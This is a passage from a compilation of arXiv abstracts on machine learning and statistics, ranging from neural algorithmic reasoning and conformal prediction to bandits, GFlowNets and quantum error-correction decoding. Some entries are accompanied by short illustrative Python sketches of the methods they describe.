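# Adam update: the adaptive optimiser advocated for stabilising OAIS.
theta, m, v = 1.5, 0.0, 0.0
b1, b2, lr, eps = 0.9, 0.999, 0.05, 1e-8
for t in range(1, 2001):
    g = grad_estimate(theta)
    m = b1 * m + (1 - b1) * g
    v = b2 * v + (1 - b2) * g * g
    mhat, vhat = m / (1 - b1 ** t), v / (1 - b2 ** t)
    theta -= lr * mhat / (np.sqrt(vhat) + eps)

print(round(theta, 1))  # the proposal mean should approach the target mean 3
```

Because the raw weights $w^2$ have heavy tails, the raw gradient magnitudes vary wildly; Adam's per-coordinate normalisation keeps the step sizes bounded, which is the stability argument in miniature.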
    Latent Space Representations of Neural Algorithmic Reasoners. (arXiv:2307.08874v1 [cs.LG])
    Neural Algorithmic Reasoning (NAR) is a research area focused on designing neural architectures that can reliably capture classical computation, usually by learning to execute algorithms. A typical approach is to rely on Graph Neural Network (GNN) architectures, which encode inputs in high-dimensional latent spaces that are repeatedly transformed during the execution of the algorithm. In this work we perform a detailed analysis of the structure of the latent space induced by the GNN when executing algorithms. We identify two possible failure modes: (i) loss of resolution, making it hard to distinguish similar values; (ii) inability to deal with values outside the range observed during training. We propose to solve the first issue by relying on a softmax aggregator, and propose to decay the latent space in order to deal with out-of-range values. We show that these changes lead to improvements on the majority of algorithms in the standard CLRS-30 benchmark when using the state-of-the-art Triplet-GMPNN processor. Our code is available at \href{https://github.com/mirjanic/nar-latent-spaces}{https://github.com/mirjanic/nar-latent-spaces}.
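The softmax aggregator proposed for the resolution issue can be sketched in isolation (a generic scalar form, not the Triplet-GMPNN implementation): a temperature-controlled weighted sum that interpolates between a mean (high temperature) and a hard max (low temperature), preserving distinctions between similar message values.

```python
import numpy as np

# Softmax aggregation of neighbour messages: smooth interpolation between
# mean and max, controlled by a temperature parameter.
def softmax_aggregate(msgs, temperature=1.0):
    msgs = np.asarray(msgs, dtype=float)
    z = msgs / temperature
    w = np.exp(z - np.max(z))          # stable softmax weights
    return float(np.sum(w * msgs) / np.sum(w))

msgs = [0.1, 0.2, 3.0]
print(softmax_aggregate(msgs, 100.0))  # close to the mean (1.1)
print(softmax_aggregate(msgs, 0.01))   # close to the max (3.0)
```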
    Towards Dynamic Causal Discovery with Rare Events: A Nonparametric Conditional Independence Test. (arXiv:2211.16596v5 [stat.ML] UPDATED)
Causal phenomena associated with rare events occur across a wide range of engineering problems, such as risk-sensitive safety analysis, accident analysis and prevention, and extreme value theory. However, current methods for causal discovery are often unable to uncover causal links between random variables in a dynamic setting that manifest only when the variables first experience low-probability realizations. To address this issue, we introduce a novel statistical independence test on data collected from time-invariant dynamical systems in which rare but consequential events occur. In particular, we exploit the time-invariance of the underlying data to construct a superimposed dataset of the system state before rare events happen at different timesteps. We then design a conditional independence test on the reorganized data. We provide non-asymptotic sample complexity bounds for the consistency of our method, and validate its performance across various simulated and real-world datasets, including incident data collected from the Caltrans Performance Measurement System (PeMS). Code containing the datasets and experiments is publicly available.
    PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models. (arXiv:2307.09254v1 [cs.LG])
Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to concerns about generating hallucinated facts. In this paper, we propose to learn neural prediction set models that come with the probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification while still satisfying the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.
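For context, the scalar-parameterized baseline the paper generalises can be sketched as split conformal prediction (a toy 3-class model with made-up probabilities, not a GLM): calibrate a single threshold on held-out scores, then form prediction sets that cover the true label at the nominal rate.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy classifier: probability ~0.7 on the true class, remainder split evenly.
n_cal, n_test, k = 1000, 1000, 3
labels = rng.integers(0, k, size=n_cal + n_test)
probs = np.full((n_cal + n_test, k), 0.15)
probs[np.arange(n_cal + n_test), labels] = 0.7
probs += rng.uniform(0, 0.05, probs.shape)
probs /= probs.sum(axis=1, keepdims=True)

# Scalar parameter: a quantile of the calibration scores 1 - p(true label).
scores = 1.0 - probs[np.arange(n_cal), labels[:n_cal]]
tau = np.quantile(scores, 0.9)

# Prediction set on test points: {y : 1 - p(y|x) <= tau}.
sets = probs[n_cal:] >= 1.0 - tau
coverage = np.mean(sets[np.arange(n_test), labels[n_cal:]])
print(round(coverage, 2))  # empirical coverage near the nominal 0.9
```

The paper's contribution is to replace the single scalar `tau` with a neural network while keeping a PAC-style coverage guarantee; this sketch shows only the scalar case.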
    Deep Riemannian Networks for EEG Decoding. (arXiv:2212.10426v5 [cs.LG] UPDATED)
State-of-the-art performance in electroencephalography (EEG) decoding tasks is currently often achieved with either Deep-Learning (DL) or Riemannian-Geometry-based decoders (RBDs). Recently, there has been growing interest in Deep Riemannian Networks (DRNs), which may combine the advantages of both previous classes of methods. However, there are still a range of topics where additional insight is needed to pave the way for a more widespread application of DRNs in EEG. These include architecture design questions such as network size and end-to-end ability. How these factors affect model performance has not been explored. Additionally, it is not clear how the data within these networks is transformed, and whether this would correlate with traditional EEG decoding. Our study aims to lay the groundwork on these topics through the analysis of DRNs for EEG with a wide range of hyperparameters. Networks were tested on two public EEG datasets and compared with state-of-the-art ConvNets. Here we propose end-to-end EEG SPDNet (EE(G)-SPDNet), and we show that this wide, end-to-end DRN can outperform the ConvNets, and in doing so use physiologically plausible frequency regions. We also show that the end-to-end approach learns more complex filters than traditional band-pass filters targeting the classical alpha, beta, and gamma frequency bands of the EEG, and that performance can benefit from channel-specific filtering approaches. Additionally, architectural analysis revealed areas for further improvement due to the possible loss of Riemannian-specific information throughout the network. Our study thus shows how to design and train DRNs to infer task-related information from the raw EEG without the need for handcrafted filterbanks, and highlights the potential of end-to-end DRNs such as EE(G)-SPDNet for high-performance EEG decoding.
    Nested Elimination: A Simple Algorithm for Best-Item Identification from Choice-Based Feedback. (arXiv:2307.09295v1 [cs.LG])
    We study the problem of best-item identification from choice-based feedback. In this problem, a company sequentially and adaptively shows display sets to a population of customers and collects their choices. The objective is to identify the most preferred item with the least number of samples and at a high confidence level. We propose an elimination-based algorithm, namely Nested Elimination (NE), which is inspired by the nested structure implied by the information-theoretic lower bound. NE is simple in structure, easy to implement, and has a strong theoretical guarantee for sample complexity. Specifically, NE utilizes an innovative elimination criterion and circumvents the need to solve any complex combinatorial optimization problem. We provide an instance-specific and non-asymptotic bound on the expected sample complexity of NE. We also show NE achieves high-order worst-case asymptotic optimality. Finally, numerical experiments from both synthetic and real data corroborate our theoretical findings.
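A drastically simplified elimination loop conveys the flavour of the approach (hypothetical multinomial-logit preference weights and a fixed phase length, not the paper's nested elimination criterion): repeatedly display the surviving items, record choices, and drop the least-chosen item.

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical MNL preferences: item 0 is strongly preferred.
w = np.array([5.0, 1.0, 1.0, 1.0])
alive = list(range(4))

while len(alive) > 1:
    probs = w[alive] / w[alive].sum()        # MNL choice probabilities
    counts = np.zeros(len(alive))
    for _ in range(400):                     # one display-and-choose phase
        counts[rng.choice(len(alive), p=probs)] += 1
    alive.pop(int(np.argmin(counts)))        # eliminate least-chosen item

print(alive[0])  # the most-preferred item (index 0) survives
```

The actual NE algorithm uses an information-theoretically motivated nested elimination criterion rather than a fixed phase length, which is what yields its instance-specific sample-complexity bound.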
    Estimation of an Order Book Dependent Hawkes Process for Large Datasets. (arXiv:2307.09077v1 [q-fin.TR])
A point process for event arrivals in high frequency trading is presented. The intensity is the product of a Hawkes process and high dimensional functions of covariates derived from the order book. Conditions for stationarity of the process are stated. An algorithm is presented to estimate the model even in the presence of billions of data points, possibly mapping covariates into a high dimensional space. The large sample size can be common for high frequency data applications using multiple liquid instruments. Convergence of the algorithm is shown, consistency results under weak conditions are established, and a test statistic to assess out-of-sample performance of different model specifications is suggested. The methodology is applied to the study of four stocks that trade on the New York Stock Exchange (NYSE). The out-of-sample testing procedure suggests that capturing the nonlinearity of the order book information adds value to the self-exciting nature of high frequency trading events.
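The multiplicative intensity structure can be sketched as follows; the exponential self-excitation kernel and the exponential covariate link are illustrative choices, not the paper's estimated specification.

```python
import numpy as np

# Intensity = g(covariates) * (mu + sum_i alpha * exp(-beta * (t - t_i))):
# a Hawkes self-excitation term modulated by an order-book feature, here a
# hypothetical bid-ask imbalance entering through an exponential link g.
def intensity(t, event_times, imbalance, mu=0.5, alpha=0.8, beta=2.0, gamma=1.0):
    past = np.asarray([s for s in event_times if s < t])
    hawkes = mu + alpha * np.sum(np.exp(-beta * (t - past)))
    return np.exp(gamma * imbalance) * hawkes

events = [1.0, 1.2]
lam_just_after = intensity(1.21, events, imbalance=0.0)
lam_later = intensity(3.0, events, imbalance=0.0)
print(lam_just_after > lam_later)  # excitation decays after events
```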
    A Covariate-Adjusted Homogeneity Test with Application to Facial Recognition Accuracy Assessment. (arXiv:2307.08846v1 [stat.AP])
Ordinal scores occur commonly in medical imaging studies and in black-box forensic studies \citep{Phillips:2018}. To assess the accuracy of raters in these studies, one needs to estimate the receiver operating characteristic (ROC) curve while accounting for covariates of raters. In this paper, we propose a covariate-adjusted homogeneity test to determine differences in accuracy among multiple rater groups. We derive the theoretical properties of the proposed test and conduct extensive simulation studies to evaluate its finite-sample performance. The proposed test is applied to a face recognition study to identify statistically significant differences among five participant groups.
    Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces. (arXiv:2307.09057v1 [math.OC])
    This paper presents a framework for computing the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, where the discrepancy is the squared Euclidean norm. The Gromov-Wasserstein problem is a generalization of the optimal transport problem that finds the assignment between two sets preserving pairwise distances as much as possible. This can be used to quantify the similarity between two formations or shapes, a common problem in AI and machine learning. The problem can be formulated as a Quadratic Assignment Problem (QAP), which is in general computationally intractable even for small problems. Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank. The method scales well with the number of points, and it can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem which is of particular interest in computational biology.
    Martian time-series unraveled: A multi-scale nested approach with factorial variational autoencoders. (arXiv:2305.16189v2 [cs.LG] UPDATED)
    Unsupervised source separation involves unraveling an unknown set of source signals recorded through a mixing operator, with limited prior knowledge about the sources, and only access to a dataset of signal mixtures. This problem is inherently ill-posed and is further challenged by the variety of time-scales exhibited by sources in time series data. Existing methods typically rely on a preselected window size that limits their capacity to handle multi-scale sources. To address this issue, instead of operating in the time domain, we propose an unsupervised multi-scale clustering and source separation framework by leveraging wavelet scattering covariances that provide a low-dimensional representation of stochastic processes, capable of distinguishing between different non-Gaussian stochastic processes. Nested within this representation space, we develop a factorial Gaussian-mixture variational autoencoder that is trained to (1) probabilistically cluster sources at different time-scales and (2) independently sample scattering covariance representations associated with each cluster. Using samples from each cluster as prior information, we formulate source separation as an optimization problem in the wavelet scattering covariance representation space, resulting in separated sources in the time domain. When applied to seismic data recorded during the NASA InSight mission on Mars, our multi-scale nested approach proves to be a powerful tool for discriminating between sources varying greatly in time-scale, e.g., minute-long transient one-sided pulses (known as ``glitches'') and structured ambient noises resulting from atmospheric activities that typically last for tens of minutes. These results provide an opportunity to conduct further investigations into the isolated sources related to atmospheric-surface interactions, thermal relaxations, and other complex phenomena.
    Conditionally Calibrated Predictive Distributions by Probability-Probability Map: Application to Galaxy Redshift Estimation and Probabilistic Forecasting. (arXiv:2205.14568v4 [stat.ML] UPDATED)
    Uncertainty quantification is crucial for assessing the predictive ability of AI algorithms. Much research has been devoted to describing the predictive distribution (PD) $F(y|\mathbf{x})$ of a target variable $y \in \mathbb{R}$ given complex input features $\mathbf{x} \in \mathcal{X}$. However, off-the-shelf PDs (from, e.g., normalizing flows and Bayesian neural networks) often lack conditional calibration with the probability of occurrence of an event given input $\mathbf{x}$ being significantly different from the predicted probability. Current calibration methods do not fully assess and enforce conditionally calibrated PDs. Here we propose \texttt{Cal-PIT}, a method that addresses both PD diagnostics and recalibration by learning a single probability-probability map from calibration data. The key idea is to regress probability integral transform scores against $\mathbf{x}$. The estimated regression provides interpretable diagnostics of conditional coverage across the feature space. The same regression function morphs the misspecified PD to a re-calibrated PD for all $\mathbf{x}$. We benchmark our corrected prediction bands (a by-product of corrected PDs) against oracle bands and state-of-the-art predictive inference algorithms for synthetic data. We also provide results for two applications: (i) probabilistic nowcasting given sequences of satellite images, and (ii) conditional density estimation of galaxy distances given imaging data (so-called photometric redshift estimation). Our code is available as a Python package https://github.com/lee-group-cmu/Cal-PIT .
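The diagnostic half of the idea can be sketched with a deliberately misspecified toy model (a model that always predicts N(0, 1) while the true noise scale grows with x; the two-bin "regression" of the PIT indicator on x is a crude stand-in for the learned regression in Cal-PIT):

```python
import math
import numpy as np

rng = np.random.default_rng(0)
Phi = lambda z: 0.5 * (1.0 + math.erf(z / math.sqrt(2.0)))  # standard normal CDF

# True data: y ~ N(0, (1 + x)^2); misspecified PD: N(0, 1) for every x.
x = rng.uniform(0.0, 2.0, size=20000)
y = rng.normal(0.0, 1.0 + x)
pit = np.array([Phi(v) for v in y])     # PIT scores under the model's PD

# Conditional coverage of the indicator 1{PIT <= gamma}, "regressed" on x
# by binning: if the PD were calibrated, both estimates would be ~gamma.
gamma = 0.9
cov_low = np.mean(pit[x < 0.5] <= gamma)    # near-calibrated region
cov_high = np.mean(pit[x > 1.5] <= gamma)   # under-dispersed region
print(round(cov_low, 2), round(cov_high, 2))
```

The gap between the binned estimates and the nominal level `gamma` is exactly the kind of feature-dependent miscalibration the probability-probability map is trained to diagnose and then morph away.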
    Robust Counterfactual Explanations for Neural Networks With Probabilistic Guarantees. (arXiv:2305.11997v2 [stat.ML] UPDATED)
    There is an emerging interest in generating robust counterfactual explanations that would remain valid if the model is updated or changed even slightly. Towards finding robust counterfactuals, existing literature often assumes that the original model $m$ and the new model $M$ are bounded in the parameter space, i.e., $\|\text{Params}(M){-}\text{Params}(m)\|{<}\Delta$. However, models can often change significantly in the parameter space with little to no change in their predictions or accuracy on the given dataset. In this work, we introduce a mathematical abstraction termed \emph{naturally-occurring} model change, which allows for arbitrary changes in the parameter space such that the change in predictions on points that lie on the data manifold is limited. Next, we propose a measure -- that we call \emph{Stability} -- to quantify the robustness of counterfactuals to potential model changes for differentiable models, e.g., neural networks. Our main contribution is to show that counterfactuals with sufficiently high value of \emph{Stability} as defined by our measure will remain valid after potential ``naturally-occurring'' model changes with high probability (leveraging concentration bounds for Lipschitz function of independent Gaussians). Since our quantification depends on the local Lipschitz constant around a data point which is not always available, we also examine practical relaxations of our proposed measure and demonstrate experimentally how they can be incorporated to find robust counterfactuals for neural networks that are close, realistic, and remain valid after potential model changes. This work also has interesting connections with model multiplicity, also known as, the Rashomon effect.
    Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives. (arXiv:2307.09366v1 [cs.LG])
    We consider the problem of learning a sparse graph underlying an undirected Gaussian graphical model, a key problem in statistical machine learning. Given $n$ samples from a multivariate Gaussian distribution with $p$ variables, the goal is to estimate the $p \times p$ inverse covariance matrix (aka precision matrix), assuming it is sparse (i.e., has a few nonzero entries). We propose GraphL0BnB, a new estimator based on an $\ell_0$-penalized version of the pseudolikelihood function, while most earlier approaches are based on the $\ell_1$-relaxation. Our estimator can be formulated as a convex mixed integer program (MIP) which can be difficult to compute at scale using off-the-shelf commercial solvers. To solve the MIP, we propose a custom nonlinear branch-and-bound (BnB) framework that solves node relaxations with tailored first-order methods. As a by-product of our BnB framework, we propose large-scale solvers for obtaining good primal solutions that are of independent interest. We derive novel statistical guarantees (estimation and variable selection) for our estimator and discuss how our approach improves upon existing estimators. Our numerical experiments on real/synthetic datasets suggest that our method can solve, to near-optimality, problem instances with $p = 10^4$ -- corresponding to a symmetric matrix of size $p \times p$ with $p^2/2$ binary variables. We demonstrate the usefulness of GraphL0BnB versus various state-of-the-art approaches on a range of datasets.
    The Score-Difference Flow for Implicit Generative Modeling. (arXiv:2304.12906v2 [cs.LG] UPDATED)
    Implicit generative modeling (IGM) aims to produce samples of synthetic data matching the characteristics of a target data distribution. Recent work (e.g. score-matching networks, diffusion models) has approached the IGM problem from the perspective of pushing synthetic source data toward the target distribution via dynamical perturbations or flows in the ambient space. In this direction, we present the score difference (SD) between arbitrary target and source distributions as a flow that optimally reduces the Kullback-Leibler divergence between them while also solving the Schroedinger bridge problem. We apply the SD flow to convenient proxy distributions, which are aligned if and only if the original distributions are aligned. We demonstrate the formal equivalence of this formulation to denoising diffusion models under certain conditions. We also show that the training of generative adversarial networks includes a hidden data-optimization sub-problem, which induces the SD flow under certain choices of loss function when the discriminator is optimal. As a result, the SD flow provides a theoretical link between model classes that individually address the three challenges of the "generative modeling trilemma" -- high sample quality, mode coverage, and fast sampling -- thereby setting the stage for a unified approach.
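The flow can be sketched in an illustrative special case where both scores are available in closed form (two one-dimensional Gaussians, with the source score refit to the current particles at each step; this is a cartoon of the SD flow, not the paper's general construction):

```python
import numpy as np

rng = np.random.default_rng(0)

# Particles from the source follow dx = [score_target(x) - score_source(x)] dt.
target_mu, target_sd = 4.0, 1.0
x = rng.normal(0.0, 1.0, size=5000)          # source samples ~ N(0, 1)

for _ in range(300):
    m, s = x.mean(), x.std()                 # Gaussian fit to current particles
    score_target = -(x - target_mu) / target_sd ** 2
    score_source = -(x - m) / s ** 2
    x = x + 0.05 * (score_target - score_source)

print(round(x.mean(), 1), round(x.std(), 1))  # particles match the target N(4, 1)
```

When the two distributions coincide the score difference vanishes, so alignment is a fixed point, which is the sense in which the flow "optimally reduces" the KL divergence in this toy setting.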
    Non-stationary Delayed Combinatorial Semi-Bandit with Causally Related Rewards. (arXiv:2307.09093v1 [cs.LG])
Sequential decision-making under uncertainty is often associated with long feedback delays. Such delays degrade the performance of the learning agent in identifying a subset of arms with the optimal collective reward in the long run. This problem becomes significantly challenging in a non-stationary environment with structural dependencies amongst the reward distributions associated with the arms. Therefore, besides adapting to delays and environmental changes, learning the causal relations alleviates the adverse effects of feedback delay on the decision-making process. We formalize the described setting as a non-stationary and delayed combinatorial semi-bandit problem with causally related rewards. We model the causal relations by a directed graph in a stationary structural equation model. The agent maximizes the long-term average payoff, defined as a linear function of the base arms' rewards. We develop a policy that learns the structural dependencies from delayed feedback and utilizes that to optimize the decision-making while adapting to drifts. We prove a regret bound for the performance of the proposed algorithm. In addition, we evaluate our method via numerical analysis using synthetic and real-world datasets to detect the regions that contribute the most to the spread of COVID-19 in Italy.
    Multi-Objective GFlowNets. (arXiv:2210.12765v2 [cs.LG] UPDATED)
We study the problem of generating diverse candidates in the context of Multi-Objective Optimization. In many applications of machine learning such as drug discovery and material design, the goal is to generate candidates which simultaneously optimize a set of potentially conflicting objectives. Moreover, these objectives are often imperfect evaluations of some underlying property of interest, making it important to generate diverse candidates to have multiple options for expensive downstream evaluations. We propose Multi-Objective GFlowNets (MOGFNs), a novel method for generating diverse Pareto-optimal solutions, based on GFlowNets. We introduce two variants of MOGFNs: MOGFN-PC, which models a family of independent sub-problems defined by a scalarization function, with reward-conditional GFlowNets, and MOGFN-AL, which solves a sequence of sub-problems defined by an acquisition function in an active learning loop. Our experiments on a wide variety of synthetic and benchmark tasks demonstrate the advantages of the proposed methods in terms of Pareto performance and, importantly, improved candidate diversity, which is the main contribution of this work.
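The scalarization idea behind MOGFN-PC can be sketched on a toy candidate set (made-up two-objective candidates, with weighted-sum scalarization and Dirichlet-sampled preferences standing in for the conditioning mechanism): each preference vector defines one sub-problem, and different preferences select different Pareto-optimal candidates.

```python
import numpy as np

rng = np.random.default_rng(0)

candidates = rng.uniform(0, 1, size=(200, 2))    # 200 candidates, 2 objectives

def pareto_mask(obj):
    """True where no other candidate dominates (maximization)."""
    keep = np.ones(len(obj), dtype=bool)
    for i in range(len(obj)):
        dominated = np.any(np.all(obj >= obj[i], axis=1) &
                           np.any(obj > obj[i], axis=1))
        keep[i] = not dominated
    return keep

front = pareto_mask(candidates)
picked = set()
for lam in rng.dirichlet([1.0, 1.0], size=50):   # sampled preference vectors
    picked.add(int(np.argmax(candidates @ lam))) # maximize scalarized reward

# Every scalarized optimum lies on the Pareto front, and varying the
# preference recovers multiple distinct front points.
print(all(front[i] for i in picked), len(picked) > 1)
```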
    Outlier-Robust Tensor Low-Rank Representation for Data Clustering. (arXiv:2307.09055v1 [stat.ML])
    Low-rank tensor analysis has received widespread attention with many practical applications. However, the tensor data are often contaminated by outliers or sample-specific corruptions. How to recover the tensor data that are corrupted by outliers and perform data clustering remains a challenging problem. This paper develops an outlier-robust tensor low-rank representation (OR-TLRR) method for simultaneous outlier detection and tensor data clustering based on the tensor singular value decomposition (t-SVD) algebraic framework. It is motivated by the recently proposed tensor-tensor product induced by invertible linear transforms that satisfy certain conditions. For tensor observations with arbitrary outlier corruptions, OR-TLRR has provable performance guarantee for exactly recovering the row space of clean data and detecting outliers under mild conditions. Moreover, an extension of OR-TLRR is also proposed to handle the case when parts of the data are missing. Finally, extensive experimental results on both synthetic and real data demonstrate the effectiveness of the proposed algorithms.
    qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers. (arXiv:2307.09025v1 [quant-ph])
We propose a general framework for decoding quantum error-correcting codes with generative modeling. The model utilizes autoregressive neural networks, specifically Transformers, to learn the joint probability of logical operators and syndromes. This training is unsupervised, without the need for labeled training data, and is thus referred to as pre-training. After the pre-training, the model can efficiently compute the likelihood of logical operators for any given syndrome, using maximum likelihood decoding. It can directly generate the most-likely logical operators with computational complexity $\mathcal O(2k)$ in the number of logical qubits $k$, which is significantly better than conventional maximum likelihood decoding algorithms that require $\mathcal O(4^k)$ computation. Based on the pre-trained model, we further propose a refinement step that estimates the likelihood of logical operators for a given syndrome more accurately by directly sampling the stabilizer operators. We perform numerical experiments on stabilizer codes with small code distances, using both depolarizing error models and error models with correlated noise. The results show that our approach provides significantly better decoding accuracy than the minimum weight perfect matching and belief-propagation-based algorithms. Our framework is general and can be applied to any error model and quantum codes with different topologies such as surface codes and quantum LDPC codes. Furthermore, it leverages the parallelization capabilities of GPUs, enabling simultaneous decoding of a large number of syndromes. Our approach sheds light on the efficient and accurate decoding of quantum error-correcting codes using generative artificial intelligence and modern computational power.
    Unsupervised Embedding Quality Evaluation. (arXiv:2305.16562v2 [cs.LG] UPDATED)
Unsupervised learning has recently gained significantly in popularity, especially with deep learning-based approaches. Despite numerous successes and approaching supervised-level performance on a variety of academic benchmarks, it is still hard to train and evaluate SSL models in practice due to the unsupervised nature of the problem. Even with networks trained in a supervised fashion, it is often unclear whether they will perform well when transferred to another domain. Past works are generally limited to assessing the amount of information contained in embeddings, which is most relevant for self-supervised learning of deep neural networks. This work chooses to follow a different approach: can we quantify how easy it is to linearly separate the data in a stable way? We survey the literature and uncover three methods that could potentially be used for evaluating the quality of representations. We also introduce one novel method based on recent advances in understanding the high-dimensional geometric structure of self-supervised learning. We conduct extensive experiments and study the properties of these metrics and of ones introduced in previous work. Our results suggest that while there is no free lunch, there are metrics that can robustly estimate embedding quality in an unsupervised way.
    Limitations of Information-Theoretic Generalization Bounds for Gradient Descent Methods in Stochastic Convex Optimization. (arXiv:2212.13556v3 [cs.LG] UPDATED)
    To date, no "information-theoretic" frameworks for reasoning about generalization error have been shown to establish minimax rates for gradient descent in the setting of stochastic convex optimization. In this work, we consider the prospect of establishing such rates via several existing information-theoretic frameworks: input-output mutual information bounds, conditional mutual information bounds and variants, PAC-Bayes bounds, and recent conditional variants thereof. We prove that none of these bounds are able to establish minimax rates. We then consider a common tactic employed in studying gradient methods, whereby the final iterate is corrupted by Gaussian noise, producing a noisy "surrogate" algorithm. We prove that minimax rates cannot be established via the analysis of such surrogates. Our results suggest that new ideas are required to analyze gradient descent using information-theoretic techniques.
    Conformal Prediction Bands for Two-Dimensional Functional Time Series. (arXiv:2207.13656v2 [stat.ME] UPDATED)
Time-evolving surfaces can be modeled as two-dimensional functional time series, exploiting the tools of functional data analysis. Leveraging this approach, a forecasting framework for such complex data is developed. The main focus revolves around Conformal Prediction, a versatile nonparametric paradigm used to quantify uncertainty in prediction problems. Building upon recent variations of Conformal Prediction for functional time series, a probabilistic forecasting scheme for two-dimensional functional time series is presented, while providing an extension of Functional Autoregressive Processes of order one to this setting. Estimation techniques for the latter process are introduced and their performance is compared in terms of the resulting prediction regions. Finally, the proposed forecasting procedure and the uncertainty quantification technique are applied to a real dataset collecting daily observations of Sea Level Anomalies of the Black Sea.
    Scaling Laws for Imitation Learning in NetHack. (arXiv:2307.09423v1 [cs.LG])
    Imitation Learning (IL) is one of the most widely used methods in machine learning. Yet, while powerful, many works find it is often not able to fully recover the underlying expert behavior. However, none of these works deeply investigate the role of scaling up the model and data size. Inspired by recent work in Natural Language Processing (NLP) where "scaling up" has resulted in increasingly more capable LLMs, we investigate whether carefully scaling up model and data size can bring similar improvements in the imitation learning setting. To demonstrate our findings, we focus on the game of NetHack, a challenging environment featuring procedural generation, stochasticity, long-term dependencies, and partial observability. We find IL loss and mean return scale smoothly with the compute budget and are strongly correlated, resulting in power laws for training compute-optimal IL agents with respect to model size and number of samples. We forecast and train several NetHack agents with IL and find they outperform prior state-of-the-art by at least 2x in all settings. Our work both demonstrates the scaling behavior of imitation learning in a challenging domain, as well as the viability of scaling up current approaches for increasingly capable agents in NetHack, a game that remains elusively hard for current AI systems.
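The mechanics of fitting such a power law are simple enough to sketch (synthetic compute-loss data with a made-up exponent, not the NetHack measurements): a linear regression on the log-log scale recovers the exponent of $L(C) = a \cdot C^{-b}$.

```python
import numpy as np

rng = np.random.default_rng(0)

# Synthetic compute budgets (FLOPs) and noisy power-law losses.
b_true = 0.28
compute = np.logspace(15, 20, num=12)
loss = 50.0 * compute ** (-b_true) * np.exp(rng.normal(0, 0.02, 12))

# log L = log a - b * log C, so ordinary least squares on log-log recovers b.
slope, intercept = np.polyfit(np.log(compute), np.log(loss), deg=1)
b_hat = -slope
print(round(b_hat, 2))  # close to the true exponent 0.28
```

Given such a fit for both model-size and sample-count scaling, one can solve for the compute-optimal allocation, which is how the forecasted agents in the paper are sized.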
    Best-of-three-worlds Analysis for Linear Bandits with Follow-the-regularized-leader Algorithm. (arXiv:2303.06825v2 [cs.LG] UPDATED)
    The linear bandit problem has been studied for many years in both stochastic and adversarial settings. Designing an algorithm that can optimize the environment without knowing the loss type attracts lots of interest. \citet{LeeLWZ021} propose an algorithm that actively detects the loss type and then switches between different algorithms specially designed for specific settings. However, such an approach requires meticulous designs to perform well in all environments. Follow-the-regularized-leader (FTRL) is another type of popular algorithm that can adapt to different environments. This algorithm is of simple design and the regret bounds are shown to be optimal in traditional multi-armed bandit problems compared with the detect-switch type. Designing an FTRL-type algorithm for linear bandits is an important question that has been open for a long time. In this paper, we prove that the FTRL algorithm with a negative entropy regularizer can achieve the best-of-three-world results for the linear bandit problem. Our regret bounds achieve the same or nearly the same order as the previous detect-switch type algorithm but with a much simpler algorithmic design.
    Oracle Efficient Online Multicalibration and Omniprediction. (arXiv:2307.08999v1 [cs.LG])
    A recent line of work has shown a surprising connection between multicalibration, a multi-group fairness notion, and omniprediction, a learning paradigm that provides simultaneous loss minimization guarantees for a large family of loss functions. Prior work studies omniprediction in the batch setting. We initiate the study of omniprediction in the online adversarial setting. Although there exist algorithms for obtaining notions of multicalibration in the online adversarial setting, unlike batch algorithms, they work only for small finite classes of benchmark functions $F$, because they require enumerating every function $f \in F$ at every round. In contrast, omniprediction is most interesting for learning theoretic hypothesis classes $F$, which are generally continuously large. We develop a new online multicalibration algorithm that is well defined for infinite benchmark classes $F$, and is oracle efficient (i.e. for any class $F$, the algorithm has the form of an efficient reduction to a no-regret learning algorithm for $F$). The result is the first efficient online omnipredictor -- an oracle efficient prediction algorithm that can be used to simultaneously obtain no regret guarantees to all Lipschitz convex loss functions. For the class $F$ of linear functions, we show how to make our algorithm efficient in the worst case. Also, we show upper and lower bounds on the extent to which our rates can be improved: our oracle efficient algorithm actually promises a stronger guarantee called swap-omniprediction, and we prove a lower bound showing that obtaining $O(\sqrt{T})$ bounds for swap-omniprediction is impossible in the online setting. On the other hand, we give a (non-oracle efficient) algorithm which can obtain the optimal $O(\sqrt{T})$ omniprediction bounds without going through multicalibration, giving an information theoretic separation between these two solution concepts.
    Scalable Coupling of Deep Learning with Logical Reasoning. (arXiv:2305.07617v2 [cs.AI] UPDATED)
In the ongoing quest for hybridizing discrete reasoning with neural nets, there is an increasing interest in neural architectures that can learn how to solve discrete reasoning or optimization problems from natural inputs. In this paper, we introduce a scalable neural architecture and loss function dedicated to learning the constraints and criteria of NP-hard reasoning problems expressed as discrete Graphical Models. Our loss function solves one of the main limitations of Besag's pseudo-loglikelihood, enabling learning of high energies. We empirically show it is able to efficiently learn how to solve NP-hard reasoning problems from natural inputs, such as the symbolic, visual, or many-solutions Sudoku problems, as well as the energy optimization formulation of the protein design problem, providing data efficiency, interpretability, and \textit{a posteriori} control over predictions.
    Resource frugal optimizer for quantum machine learning. (arXiv:2211.04965v2 [quant-ph] UPDATED)
